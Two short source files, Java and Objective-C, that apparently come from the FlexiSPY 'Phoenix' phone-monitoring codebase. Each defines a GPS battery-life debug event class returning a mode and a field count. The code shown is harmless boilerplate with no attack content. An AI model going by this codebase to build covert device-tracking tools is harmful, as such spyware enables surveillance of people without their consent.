File: BlackBerry/2012-01-11_v.1.03.2/Phoenix/src/com/vvt/prot/event/GpsBatteryLifeDebugEvent.java
package com.vvt.prot.event;

public class GpsBatteryLifeDebugEvent extends BatteryLifeDebugEvent {

	private int fieldCount = 4;
	public int getFieldCount() {
		return fieldCount;
	}
	
	public DebugMode getMode() {
		return DebugMode.GPS;
	}	
	
}

File: iOS/FlexiSPY Phoenix 4.1.2/codebase/PhoenixEngine/Phoenix/ProtocolBuilder/Classes/Event/System/GPSBatteryLifeDebugEvent.m
//
//  GPSBatteryLifeDebugEvent.m
//  ProtocolBuilder
//
//  Created by Pichaya Srifar on 8/29/11.
//  Copyright 2011 Vervata. All rights reserved.
//

#import "GPSBatteryLifeDebugEvent.h"
#import "DebugModeEnum.h"

@implementation GPSBatteryLifeDebugEvent

-(DebugMode)getMode {
	return GPS_BATTERY_LIFE;
}

- (int)getFieldCount {
	return 0;
}

@end
